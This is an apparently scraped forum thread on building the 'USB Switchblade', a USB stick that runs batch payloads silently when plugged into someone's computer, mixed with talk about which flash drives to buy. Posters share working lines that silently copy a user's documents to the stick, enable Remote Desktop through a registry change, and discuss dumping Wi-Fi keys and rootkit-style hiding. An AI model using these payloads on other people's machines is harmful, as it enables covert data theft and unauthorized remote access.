USB Switchblade Development

Darren Kitchen

Is there a way to get it to ask me what to do and give me the options:

-Open folder to view files

-View images

-Play audio in this folder

etc.

While having most if not all of the switchblade hidden?(I have it hidden with the windows xp folder options) Im trying it now, but I cant get it to work while the files are "hidden"

• Replies 581
  • Created
  • Last Reply

Top Posters In This Topic

Is there a way to get it to ask me what to do and give me the options:

-Open folder to view files

-View images

-Play audio in this folder

etc.

While having most if not all of the switchblade hidden?(I have it hidden with the windows xp folder options) Im trying it now, but I cant get it to work while the files are "hidden"

what are you trying to do? do you just want it to pop up so that once it is done running you know by the popup?

if thats all you want you can add in the command

ping -n 5 localhost > NUL

start

nircmd.exe win max ititle "Removeable"

this will popup the flash drive's root folder

ok, Ive thought this out, and have some ideas.

1. To hide it, we can either have the batch set windows to hiding hidden files, or we can use a similiar approach to a rootkit. There are disadvantages to both options. The first can be seen by a smart user, while the second will be picked up by rootkit finders.

2. Ive been working on a few scripts that do some pretty cool stuff with wireless networks. Namely, they get the wireless key for the network you are currently connected to. They also retrieve the info required to decode the codes for surrounding networks, and their ssids(now, because this can take up to 2minutes per network, so Im not sure if I want to do it, or at least I might limit it to one network. It also retrieves type of security(wep, wpa, wpa2), and I am working on signal strength.

3.Now,I need someone to help me with this one, but I am using some tools from sysinternals(psexec to name one) to gather the same info from all computers in the network, maybe with a limit of 5 due to time constraints.

4.Finally, I am working on executing the batches in a different, more efficient order. Basicly, batches only go on to the next command after the first has been executed. With all of the addons I have been programming, the time is starting to hit a minute for a full execute. What I am doing now is making a pyramid organization like so:

1.Main batch

A.First subbatch

1.Run programs section 1

2.Run programs section 2

B.Second subbatch

3.Run programs section 3

4.Run programs section 4

Basicly, with the number or programs starting to get close, and exceeding 16, this is the most efficient way to run them. The main batch starts the first and second subbatches, with very little overhead. Those batches run 4 more batches that each run 4 or more programs, creating very little waiting time.

well, I like to map out nearby wireless networks, and signal strength is useful for that. Is u3 really necessary for this?

EDIT: I have a choice of these drives, which have u3? Does kingston u3 work with the switchblade? What would you recommend? My budget really only goes up to $45. These would be bought from a friend, so no shipping cost, and one day delivery.

two kingston ones

dtiu3 1gb $33

dtiu3ed 1gb 32

and a few sandisk ones (faster)

Mini cruser's

SDCZ6-1024-A10 $44

SDCZ6-2048-A10 $70

Titanium's

SDCZ7-1024-A10 $55

SDCZ7-2048-A10 $87

well, I like to map out nearby wireless networks, and signal strength is useful for that. Is u3 really necessary for this?

EDIT: I have a choice of these drives, which have u3? Does kingston u3 work with the switchblade? What would you recommend? My budget really only goes up to $45. These would be bought from a friend, so no shipping cost, and one day delivery.

two kingston ones

dtiu3 1gb $33

dtiu3ed 1gb 32

and a few sandisk ones (faster)

Mini cruser's

SDCZ6-1024-A10 $44

SDCZ6-2048-A10 $70

Titanium's

SDCZ7-1024-A10 $55

SDCZ7-2048-A10 $87

I would go SanDisk all the way, they work flawlessly. U3 or non-U3 :D

ok, well now I actually have a different choice

I can get a 1gig sandisk mini for a price I haven't been told, and I would get it tommorow,

or I can get something else for under $45 shipped. Suggestions? I have been looking at the ocz rally 2, but I heard it has terrible random access times. I don't care about u3 much at this point, if it has it great, if not oh well. I am looking for speed and durability. Suggestions?

i have the cruzer micro 1 gb and i have to say i like it. its pretty duriable, i usually go through a flash drive about every other month or so because i break them and this one seams like it will hold up pretty well. i got mine off of ebay for like 30 shipped, i would check it out you can get them there pretty cheap if you spend a little time looking. good luck with the search.

what about the cruzer mini? Does anyone here have it? Is it fast?

I have the mini and 2 more SanDisk, they all work flawlessly. Can I ask why are you so worried about speed? Your gonna get the same speed reguardless usb 2.0 is usb 2.0. I'm not sure if these drives have any specifications on speed other than the standard usb 2.0, but I would recommend any SanDisk :D

ok, well two questions, first, which would you recommend,

kingston datatraveler elite 1gb

patriot extreme performance(32MB/s read, 24 write) 1gb

same as above but 2gb

sandisk titanium u3 1gb

second, is there anywhere that I can dl a premade switchblade, as the package thing isn't working for me.

@ deathwarder

SanDisk buddy, switchblade is flawless with them. Not sure what you mean by package thing isn't working? It works fine all all 3 of my SanDisk's the only 1 I'm havin trouble with is a Memorex U3 and I know it's just the flashing that's the problem.

Ok so I was thinking about a change that could be made just to have a little fun. I'm sorry I'm new to this forum so I hope this is the right place, but my idea was to simply change this to run multiple prank exe's. I started to try to do this myself but can't figure out the code in the .cmd file to run the exe's at the same time. I did get it to run them one after the other but I would have to leave the usb in the drive while the person is on it. Would there be anyway to possibly get them all to run at once silently or possibly copy them to the computer and then run one at a time?

Just for info the pranks I'm trying to use are on www.computerpranks.com

Thanks ahead of time

I just wanted to tell Amish that I was extremly thankful for your autorun technique... while your version of the hack saw is "neat" having the ability to almost completly "auto" run my Port App starter is awsome... For the last year I would do the "Open Folder" and then double click a *.bat file I had made, but now thanks to your autorun.inf technique I just tell it to open folder and my port app menu starts... Thank you again

You saved me from shelling out for a U3 tonight.

-Sam

Wondering if anyone might be able to help me. I added to the payload I'm using to enable RDP, but theres one part I'm not sure how to go about enabling via command line.

You have to right click on my computer --> properties --> Remote

and then there is a check box that needs to be checked to accept connections. Anyone have any idea how to do that by command line or how I can implement that into the switchblade?

but the only thing downloadable is the audit program.

As an example, say you want to grab items from the current logged in users documents, add this to your .bat file somwhere:

mkdir %~d0%computername%

xcopy "C:Documents and Settings%username%My Documents*.doc" %~d0%computername% /s/c/q/r/h

It will create a directory with the computer's name and start copying anything with a .doc extention it finds

but the only thing downloadable is the audit program.

As an example, say you want to grab items from the current logged in users documents, add this to your .bat file somwhere:

mkdir %~d0%computername%

xcopy "C:Documents and Settings%username%My Documents*.doc" %~d0%computername% /s/c/q/r/h

It will create a directory with the computer's name and start copying anything with a .doc extention it finds

What if I wanted to copy only .doc and .jpg, would I need to add a new line:

xcopy "C:Documents and Settings%username%My Documents*.doc"

xcopy "C:Documents and Settings%username%My Documents*.jpg"

or can we seperate it somehow in the same line

xcopy "C:Documents and Settings%username%My Documents*.doc, .jpg"

I agree a package to copy documents, the above command stops at My Documents. Inside my documents is usually My Pictures and My Music I'm assuming this will search through the entire my documents and dump all .doc or .jpg?

how much longer would it take if we make it this:

mkdir %~d0%computername%

xcopy "C:*.doc" %~d0%computername% /s/c/q/r/h

That is the one downside of copying files, it can take a while to search and copy. Since most people put documents either in the "My Documents" folder or on their desktop that is where I would have it start for backing up my files :-), otherwise you will probably get a lot of crap, like product documentation etc. What would be really slick is to check if either Google or Yahoo desktop search is on the system and query the API, that would probably make it go a lot faster.

I use a similar script to back up contents of some folders I keep code, although a bit different in that I compare the contents and have it update any files that are new and archive/rename the older versions.

I put up a description here on the "slackers" guide to podslurping, with a quick downloadable package.

http://www.usbhacks.com/2006/10/29/how-to-...sb-flash-drive/

Not sure if this is the kind of thing that would go on the Wiki here, it is pretty simple really, folks here could probably do something a lot better, especially if it is written in a lower level language instead of relying on a batch script.

Wondering if anyone might be able to help me. I added to the payload I'm using to enable RDP, but theres one part I'm not sure how to go about enabling via command line.

You have to right click on my computer --> properties --> Remote

and then there is a check box that needs to be checked to accept connections. Anyone have any idea how to do that by command line or how I can implement that into the switchblade?

I did this to my switchblade too. The following line makes the needed registry change and will be reflected in the checkbox.

@reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f >> Documentslogfiles%computername%_load.log 2>&1